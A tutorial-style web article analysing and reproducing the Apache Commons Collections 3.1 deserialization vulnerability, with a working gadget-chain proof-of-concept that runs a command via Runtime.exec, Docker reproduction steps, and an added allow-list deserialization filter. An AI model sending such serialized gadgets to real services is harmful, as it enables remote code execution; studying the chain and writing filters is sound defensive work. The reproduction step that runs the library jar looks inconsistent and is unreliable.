How to analyze and reproduce Apache Commons Collections deserialization vulnerabilities

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

How do you analyze and reproduce the Apache Commons Collections deserialization vulnerability? This article walks through the gadget chain step by step and then reproduces it in a Docker container, so that anyone facing the same question has a simple, working procedure to follow.

1.1 Status

Completed: analysis of the conditions required to exploit the vulnerability, and reproduction of the exploit.

1.2 Vulnerability analysis

Affected versions: Apache Commons Collections 3.2.1 and earlier (the POC below uses 3.1). Environment used here: JDK 1.7.0_80, Apache Maven 3.6.3.

POC core code:

    package com.patrilic.vul;

    import org.apache.commons.collections.Transformer;
    import org.apache.commons.collections.functors.ConstantTransformer;
    import org.apache.commons.collections.functors.InvokerTransformer;
    import org.apache.commons.collections.functors.ChainedTransformer;
    import org.apache.commons.collections.map.TransformedMap;
    import java.io.ByteArrayInputStream;
    import java.io.ByteArrayOutputStream;
    import java.io.ObjectInputStream;
    import java.io.ObjectOutputStream;
    import java.lang.reflect.Constructor;
    import java.util.HashMap;
    import java.util.Map;

    public class EvalObject {
        public static void main(String[] args) throws Exception {
            // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(cmd)
            Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class},
                        new Object[] {"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class},
                        new Object[] {null, new Object[0]}),
                // new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc"}),
                new InvokerTransformer("exec", new Class[] {String.class},
                        new Object[] {"touch /tmp/CommonsCollections3.1"})
            };
            // store the transformer array in a ChainedTransformer
            Transformer transformerChain = new ChainedTransformer(transformers);
            // transformerChain.transform(null);   // would run the chain directly

            // create the Map and bind transformerChain to it as the value transformer
            Map innerMap = new HashMap();
            innerMap.put("value", "value");
            Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

            // trigger the vulnerability without deserialization (for testing the chain):
            // Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
            // onlyElement.setValue("foobar");

            Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor cons = clazz.getDeclaredConstructor(Class.class, Map.class);
            cons.setAccessible(true);
            Object ins = cons.newInstance(java.lang.annotation.Retention.class, outerMap);

            // serialize ins
            ByteArrayOutputStream exp = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(exp);
            oos.writeObject(ins);
            oos.flush();
            oos.close();

            // deserialize the serialized data stream to verify that the command runs
            ByteArrayInputStream out = new ByteArrayInputStream(exp.toByteArray());
            ObjectInputStream ois = new ObjectInputStream(out);
            Object obj = (Object) ois.readObject();
        }
    }

Exploit ideas:

The Transformer interface has an implementation class, InvokerTransformer, whose transform() method invokes an arbitrary method by name on its input through reflection.

To reach Runtime.getRuntime().exec(cmd), several transformers have to be called one after another, with the return value of each call becoming the input of the next.

To start the chain from Runtime, use ConstantTransformer, whose transform() ignores its input and returns a fixed object (here Runtime.class).

ChainedTransformer is the implementation that does the sequencing: given a Transformer array, its transform() method (whose argument is supplied by the caller) applies each element in order and feeds the result into the next. Any call to ChainedTransformer.transform() therefore executes the whole chain, so the remaining task is to find a path from deserialization to that call.

Starting from the point where deserialized data is read, work backwards to a place that calls transform() on an attacker-controlled Transformer.

HashMap stores data as key-value pairs; put(key, value) inserts them.

TransformedMap wraps a Map and applies its transformers to entries as they are stored. Its static decorate() method creates the wrapper, and its checkSetValue() method executes this.valueTransformer.transform(value). Two things are therefore needed: a way to call checkSetValue() [1], and a way to make this.valueTransformer a ChainedTransformer object [2].

For [2], the static method TransformedMap.decorate(map, keyTransformer, valueTransformer) sets valueTransformer directly.

For [1], the setValue() method of the static MapEntry class inside AbstractInputCheckedMapDecorator executes this.parent.checkSetValue(value), so this.parent must be a TransformedMap object [3].

For [3], read forwards through this line of the POC:

Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();

Tracing it: TransformedMap inherits entrySet() from AbstractInputCheckedMapDecorator, which (because a value transformer is set) returns an EntrySet holding the decorator itself as parent; the iterator of that set wraps every underlying entry in a MapEntry(entry, parent). The entry obtained here therefore has this.parent set to the TransformedMap, and calling setValue() on it runs checkSetValue() and with it the whole chain.

To make the trigger general, the deserialization itself must fire the chain, so look for a class whose readObject() overrides the default and calls setValue() on the entries of a Map-typed field whose contents can be controlled. sun.reflect.annotation.AnnotationInvocationHandler meets this requirement: its readObject() iterates over its memberValues Map and calls setValue() on an entry. It only does so for entries whose key is the name of a member of the annotation type passed to the constructor, which is why the POC uses java.lang.annotation.Retention.class together with the key "value" (Retention's only member). Note that this readObject() was rewritten in JDK 8u72, so the chain as written works on the JDK 1.7.0_80 used here and on older JDK 8 builds, but not on later ones.

Class.forName() loads a class by name; it is needed because AnnotationInvocationHandler is package-private and cannot be referenced directly in source.

Now, for [1], read forwards through the core of the POC:

Class clazz = Class.forName ("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor cons = clazz.getDeclaredConstructor (Class.class,Map.class); cons.setAccessible (true); Object ins = cons.newInstance (java.lang.annotation.Retention.class,outerMap); … Object obj = (Object) ois.readObject ()

Tracing it: readObject() on the stream reconstructs the AnnotationInvocationHandler, whose own readObject() walks memberValues (the TransformedMap) through entrySet(), so that each entry is a MapEntry with this.parent equal to the TransformedMap; the setValue() call on that entry reaches checkSetValue() and triggers the vulnerability.

In summary, the forward construction is: build the ChainedTransformer; create an inner Map; wrap it with TransformedMap so that the ChainedTransformer becomes its value transformer; obtain through reflection an AnnotationInvocationHandler instance initialized with that Map; and serialize it. Wherever the resulting bytes are deserialized with Commons Collections on the classpath, the command runs.
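The chain above fires because a plain ObjectInputStream instantiates whatever class descriptors the stream names. The following is an added example, not code from the original article: a look-ahead ObjectInputStream that checks every class name against an explicit allow-list in resolveClass(), which runs before the object is allocated and therefore before AnnotationInvocationHandler.readObject() can start the transformer chain. It assumes commons-collections 3.1 on the classpath (only to build the same gadget as the POC, with a harmless command); the allow-list contents and the /tmp/SafeObjectInputStream.demo path are illustrative choices, and the rejection itself does not depend on the JDK version because it keys on the class name alone.

```java
package com.patrilic.vul;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.lang.reflect.Constructor;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

// Added example: a look-ahead ObjectInputStream. resolveClass() is consulted for
// every class descriptor in the stream before the object is instantiated, so the
// outermost gadget class (AnnotationInvocationHandler) is rejected before its
// readObject() and the ChainedTransformer can run.
public class SafeObjectInputStream extends ObjectInputStream {
    // Allow-list assumed for this example: the application only expects a
    // HashMap of Strings. Extend it deliberately, class by class, never by package.
    private static final Set<String> ALLOWED = new HashSet<String>(Arrays.asList(
            "java.util.HashMap",
            "java.lang.String"));

    public SafeObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!ALLOWED.contains(name)) {
            throw new InvalidClassException(name, "class not on deserialization allow-list");
        }
        return super.resolveClass(desc);
    }

    // Builds the same AnnotationInvocationHandler/TransformedMap gadget as the
    // POC above (harmless command) and returns its serialized form.
    static byte[] buildGadgetStream() throws Exception {
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class},
                    new Object[] {"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class},
                    new Object[] {null, new Object[0]}),
            new InvokerTransformer("exec", new Class[] {String.class},
                    new Object[] {"touch /tmp/SafeObjectInputStream.demo"})  // illustrative path
        };
        Map innerMap = new HashMap();
        innerMap.put("value", "value"); // key must name a member of the annotation type (Retention.value)
        Map outerMap = TransformedMap.decorate(innerMap, null, new ChainedTransformer(transformers));
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor cons = clazz.getDeclaredConstructor(Class.class, Map.class);
        cons.setAccessible(true);
        Object ins = cons.newInstance(java.lang.annotation.Retention.class, outerMap);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(ins);
        oos.close();
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Benign stream: a HashMap of Strings is on the allow-list and is restored.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        Map<String, String> benign = new HashMap<String, String>();
        benign.put("k", "v");
        oos.writeObject(benign);
        oos.close();
        Object ok = new SafeObjectInputStream(new ByteArrayInputStream(bos.toByteArray())).readObject();
        System.out.println("benign map restored: " + ok);

        // Gadget stream: rejected at its first class descriptor; no transformer runs
        // and /tmp/SafeObjectInputStream.demo is never created.
        byte[] payload = buildGadgetStream();
        try {
            new SafeObjectInputStream(new ByteArrayInputStream(payload)).readObject();
            System.out.println("UNEXPECTED: gadget accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.classname + " (" + e.getMessage() + ")");
        }
    }
}
```

Feeding the same payload to a plain ObjectInputStream, as the POC does, runs the command; with SafeObjectInputStream the InvalidClassException names sun.reflect.annotation.AnnotationInvocationHandler, which shows the check fires on the outermost object rather than after the map has been walked. On JDK 9 and later (or 8u121 and later) the built-in ObjectInputFilter mechanism can express the same allow-list without subclassing, but the resolveClass() override works on the JDK 1.7 environment used in this article.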

1.3 Docker reproduction

Download the prepared Docker image with the following command:

docker pull 296645429/apache-commons-collections-vulnerability-ubuntu:v1

Set up a container network and IP address and start the container, for example:

(1) Create a custom network

docker network create --subnet=192.168.10.1/24 testnet

(2) Start the container

docker run -p 8088:8088 -p 8081:8081 -it --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash

Replace ubuntuxxx:xxx with the image pulled above. Note that the --ip value must lie inside the subnet created in step (1): with 192.168.10.1/24, Docker will reject 10.10.10.100, so either choose an address such as 192.168.10.100 or create the network with a matching subnet.

Inside the container (Apache-Commons-Collections), run the command java -jar commons-collections-3.1.jar; the file CommonsCollections3.1 is then created in /tmp by the transformer chain, as shown in the following figure.

This concludes the analysis and reproduction of the Apache Commons Collections deserialization vulnerability.
© 2024 shulou.com SLNews company. All rights reserved.
